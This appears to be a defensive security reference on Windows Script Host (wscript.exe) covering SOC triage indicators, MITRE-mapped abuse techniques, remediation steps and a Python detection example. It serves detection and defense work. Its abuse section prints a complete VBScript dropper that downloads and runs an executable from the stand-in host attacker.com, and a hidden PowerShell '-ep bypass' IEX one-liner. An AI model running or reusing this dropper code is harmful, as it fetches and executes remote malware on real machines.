Critical Risk | Windows | Legitimate | Commonly Abused
wscript.exe | SCRIPT ENGINE

wscript.exe - Windows Script Host Security Analysis

wscript.exe (Windows Script Host) executes **VBScript and JScript** files. It is one of the **most abused Windows components** for malware delivery via email attachments (.vbs, .js, .wsf files). Nearly every wscript.exe execution in modern environments should be treated as **potentially malicious**.

Risk Summary

CRITICAL priority for SOC triage. wscript.exe/cscript.exe executions are **almost always malicious** in modern environments. Legitimate scripting uses PowerShell. Any execution of .vbs, .js, or .wsf files warrants **immediate investigation and containment**.

Overview

What is wscript.exe?

wscript.exe is the GUI version of Windows Script Host. It executes VBScript and JScript files.

Related Executables

| Binary | Description |
|---|---|
| wscript.exe | GUI script host |
| cscript.exe | Console script host |

Why It's Dangerous

Primary Malware Vector:

  • Email attachments (.vbs, .js)
  • Download and execute capability
  • Full Windows API access
  • Trusted Microsoft binary

Security Significance

  • Malware Favorite: Top infection vector
  • Full System Access: No sandboxing
  • Phishing Delivery: Common email payload
  • Legacy Burden: Rarely needed legitimately

Normal Behavior

Expected Process State

| Property | Expected Value |
|---|---|
| Path | C:\Windows\System32\wscript.exe |
| Parent | explorer.exe (double-click) |
| User | Logged-in user |

Modern Reality

⚠️ wscript.exe execution in modern environments is SUSPICIOUS BY DEFAULT

Legitimate use cases:
- Legacy enterprise scripts (rare)
- Some installer scripts

Default Association

.vbs, .js, .wsf → wscript.exe

Common Locations

C:\Windows\System32\wscript.exe
C:\Windows\SysWOW64\wscript.exe
C:\Windows\System32\cscript.exe

Suspicious Indicators

Legitimate vs Suspicious

LEGITIMATE (Rare)

Script:      Known enterprise script
Path:        Approved script location
Parent:      Scheduled task (documented)
Frequency:   Rare

SUSPICIOUS (Default Assumption)

Script:      Email attachment
Path:        %TEMP%, Downloads, Desktop
Parent:      outlook.exe, browser
Behavior:    Network connections
             Spawning cmd/powershell
             Registry modifications

Immediate Red Flags

| Indicator | Risk Level |
|---|---|
| Script from email | CRITICAL |
| Script from Downloads | CRITICAL |
| Spawns cmd/powershell | CRITICAL |
| Network connection | CRITICAL |
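
The path, parent and child-process indicators above can be checked mechanically against process-creation telemetry. The Python below is an added example, not code from the original page; the event field names (`image`, `parent_image`, `command_line`), the browser process names and the sample events are constructed assumptions.

```python
import re
from ntpath import basename  # Windows path handling on any platform

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf")
# Assumption: example browser names; the page only says "browser".
MAIL_OR_BROWSER = {"outlook.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
USER_DIRS = re.compile(r"\\(temp|downloads|desktop)\\", re.IGNORECASE)

def script_path(command_line):
    """Return the first quoted or bare argument with a WSH script extension."""
    for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', command_line):
        arg = quoted or bare
        if arg.lower().endswith(SCRIPT_EXTS):
            return arg
    return None

def triage(event):
    """Return the red flags raised by one process-creation event."""
    image = basename(event["image"]).lower()
    parent = basename(event["parent_image"]).lower()
    flags = []
    if image in SCRIPT_HOSTS:
        script = script_path(event["command_line"])
        if script and USER_DIRS.search(script):  # %TEMP%, Downloads, Desktop
            flags.append("script in user-writable path")
        if parent in MAIL_OR_BROWSER:  # script opened from email or download
            flags.append("launched by mail client or browser")
    if parent in SCRIPT_HOSTS and image in SHELLS:  # script host is the parent
        flags.append("script host spawned cmd/powershell")
    return flags

# Constructed sample events (not real telemetry).
EVENTS = [
    {"image": r"C:\Windows\System32\wscript.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "command_line": r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\AppData\Local\Temp\invoice.vbs"'},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\wscript.exe",
     "command_line": "powershell.exe -NoProfile"},
    {"image": r"C:\Windows\System32\cscript.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "command_line": r'cscript.exe //B "C:\Scripts\inventory.vbs"'},
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(basename(ev["image"]), "->", triage(ev) or "no red flag")
```

The third event, a script run from a fixed location under a service parent, raises no flag here; under this page's guidance it still needs to be matched against a documented, approved script before it is dismissed.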

Abuse Techniques

Attack Techniques

Technique #1: Malware Dropper (T1059.005)

Classic Malicious VBS:

Set shell = CreateObject("Wscript.Shell")
Set http = CreateObject("MSXML2.XMLHTTP")
http.Open "GET", "http://attacker.com/mal.exe", False
http.Send
Set stream = CreateObject("ADODB.Stream")
stream.Open
stream.Type = 1
stream.Write http.responseBody
stream.SaveToFile "C:\mal.exe", 2
stream.Close
shell.Run "C:\mal.exe"

Technique #2: Phishing Delivery (T1566.001)

Email Attachment Flow:

  1. Victim receives email with .vbs/.js attachment
  2. User double-clicks → wscript.exe executes
  3. Script downloads and runs malware

Technique #3: Command Execution (T1059.003)

CreateObject("Wscript.Shell").Run "powershell -ep bypass -c IEX(...)", 0

Technique #4: Persistence (T1547.001)

Adding scripts to Run keys or Startup folder.

Remediation Steps

Protection and Remediation

Defense: Disable WSH (Recommended)

[HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings]
"Enabled"=dword:00000000

Defense: Change File Association

Associate .vbs/.js with notepad.exe instead.

Defense: Block at Email Gateway

Block .vbs, .js, .wsf, .jse, .vbe attachments.

If Compromise Suspected

  1. Terminate wscript/cscript immediately
  2. Preserve script file
  3. Analyze script content
  4. Check for downloaded files
  5. Hunt for persistence
  6. Contain and remediate

Investigation Checklist

  • Preserve the executed script file
  • Analyze script content for IOCs
  • Check script origin (email, download)
  • Review child processes
  • Check network connections made
  • Search for downloaded files
  • Review registry modifications
  • Check for persistence mechanisms

MITRE ATT&CK Techniques

Last verified: January 18, 2026